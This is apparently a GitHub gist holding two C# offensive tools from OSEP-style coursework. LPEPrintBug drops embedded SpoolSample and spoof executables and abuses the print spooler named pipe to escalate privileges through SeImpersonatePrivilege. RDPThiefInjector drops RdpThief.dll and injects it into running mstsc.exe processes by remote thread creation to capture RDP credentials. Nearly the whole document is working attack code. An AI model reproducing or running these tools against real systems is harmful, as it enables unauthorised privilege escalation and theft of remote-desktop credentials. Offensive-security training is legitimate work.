Skip to content

Instantly share code, notes, and snippets.

@tahadraidia
Last active December 1, 2021 06:09
Show Gist options
  • Save tahadraidia/74540f5749d83b2fcbb317187cd18205 to your computer and use it in GitHub Desktop.
Save tahadraidia/74540f5749d83b2fcbb317187cd18205 to your computer and use it in GitHub Desktop.
Taking advantage of Assembly.GetManifestResourceStream for quick dirt hacks, for more details please read: https://tahadraidia.com/posts/taking-advantage-of-assembly.getmanifestresourcestream-for-quick-dirt-hacks/ #OSEP #CSHARP #DOTNET
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Collections.Generic;
using System.Text.RegularExpressions;
namespace LPEPrintBug
{
public static class Program
{
public static uint TOKEN_QUERY = 0x00000008;
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES
{
public LUID Luid;
public UInt32 Attributes;
public const UInt32 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001;
public const UInt32 SE_PRIVILEGE_ENABLED = 0x00000002;
public const UInt32 SE_PRIVILEGE_REMOVED = 0x00000004;
public const UInt32 SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public Int32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct PRIVILEGE_SET
{
public uint PrivilegeCount;
public uint Control; // use PRIVILEGE_SET_ALL_NECESSARY
public static uint PRIVILEGE_SET_ALL_NECESSARY = 1;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
public LUID_AND_ATTRIBUTES[] Privilege;
}
[DllImport("advapi32.dll")]
static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool PrivilegeCheck(
IntPtr ClientToken,
ref PRIVILEGE_SET RequiredPrivileges,
out bool pfResult
);
public static bool IsPrivilegeEnabled(string Privilege)
{
bool ret;
LUID luid = new LUID();
IntPtr hProcess = GetCurrentProcess();
IntPtr hToken;
if (hProcess == IntPtr.Zero) return false;
if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return false;
if (!LookupPrivilegeValue(null, Privilege, out luid)) return false;
PRIVILEGE_SET privs = new PRIVILEGE_SET { Privilege = new LUID_AND_ATTRIBUTES[1], Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1 };
privs.Privilege[0].Luid = luid;
privs.Privilege[0].Attributes = LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;
if (!PrivilegeCheck(hToken, ref privs, out ret)) return false;
return ret;
}
// Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
public static void WriteResourceToFile(string resourceName, string fileName)
{
try
{
int bufferSize = 4096; // set 4KB buffer
byte[] buffer = new byte[bufferSize];
using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
using (Stream output = new FileStream(fileName, FileMode.Create))
{
int byteCount = input.Read(buffer, 0, bufferSize);
while (byteCount > 0)
{
output.Write(buffer, 0, byteCount);
byteCount = input.Read(buffer, 0, bufferSize);
}
}
}catch(Exception e) { Console.WriteLine(e.Message); }
}
public static void Main()
{
bool isElevated;
WindowsIdentity identity = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(identity);
isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator);
// Already admin bail.
if (isElevated)
{
Console.WriteLine("Already Administrator!");
System.Environment.Exit(0);
}
// SeImpersonatePrivilege not available.
if (!IsPrivilegeEnabled("SeImpersonatePrivilege"))
{
Console.WriteLine("SeImpersonatePrivilege privilege is required.");
System.Environment.Exit(0);
}
const string spoolsample = @"C:\Windows\Tasks\SpoolSample.exe";
const string spoof = @"C:\Windows\Tasks\spoof.exe";
const string local = @"C:\Windows\Tasks\local.exe";
string hostname = Dns.GetHostName();
// Check for file on Disk
var files = new List<String>();
files.Add(spoolsample);
files.Add(spoof);
files.Add(local);
Regex regx = new Regex("[a-zA-Z0-9]+.exe");
foreach (string file in files)
{
if(!File.Exists(file))
{
MatchCollection matched= regx.Matches(file);
if(matched.Count == 1)
{
WriteResourceToFile(matched[0].Value, file);
}
}
}
// Give it time.
Thread.Sleep(3000);
// Bail if files does not exists on disk.
if (!File.Exists(spoof) || !File.Exists(spoolsample))
System.Environment.Exit(0);
string spoolsampleparam = String.Format("{0} {0}/pipe/test", hostname);
Runner runner1 = new Runner(spoof, @"\\.\pipe\test\pipe\spoolss");
Runner runner2 = new Runner(spoolsample, spoolsampleparam);
Thread th1 = new Thread(new ThreadStart(runner1.Execute));
th1.Start();
if (th1.ThreadState == System.Threading.ThreadState.Running)
new Thread(new ThreadStart(runner2.Execute)).Start();
}
}
public class Runner
{
private string filename = null;
private string param = null;
public Runner(string filename, string param)
{
this.filename = filename;
this.param = param;
}
public void Execute()
{
Process pr = new Process();
ProcessStartInfo prs = new ProcessStartInfo();
prs.FileName = filename;
prs.Arguments = param;
pr.StartInfo = prs;
bool ret = pr.Start();
if(!ret)
{
Console.WriteLine("Something went wrong, bail!");
System.Environment.Exit(0);
}
}
}
}
using System;
using System.IO;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace RDPThiefInjector
{
public class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
// Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
public static void WriteResourceToFile(string resourceName, string fileName)
{
try
{
int bufferSize = 4096; // set 4KB buffer
byte[] buffer = new byte[bufferSize];
using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
using (Stream output = new FileStream(fileName, FileMode.Create))
{
int byteCount = input.Read(buffer, 0, bufferSize);
while (byteCount > 0)
{
output.Write(buffer, 0, byteCount);
byteCount = input.Read(buffer, 0, bufferSize);
}
}
}
catch (Exception e) { Console.WriteLine(e.Message); }
}
public static void Main()
{
const String dllName = @"C:\Windows\Tasks\rdp.dll";
String creds = String.Format("{0}/data.bin",Environment.GetEnvironmentVariable("TMP"));
WriteResourceToFile("RdpThief.dll", dllName);
if (!File.Exists(dllName))
System.Environment.Exit(0);
Console.WriteLine("Program Strated ...");
while (true)
{
Process[] mstscProc = Process.GetProcessesByName("mstsc");
if (mstscProc.Length > 0)
{
if (!File.Exists(dllName))
System.Environment.Exit(0);
for (int i = 0; i < mstscProc.Length; i++)
{
int pid = mstscProc[i].Id;
IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid);
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
IntPtr outSize;
WriteProcessMemory(hProcess, addr,
Encoding.Default.GetBytes(dllName), dllName.Length, out outSize);
IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr,
0, IntPtr.Zero);
}
}
if (File.Exists(creds))
Console.WriteLine("Found: " + creds);System.Environment.Exit(0);
Thread.Sleep(1000);
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment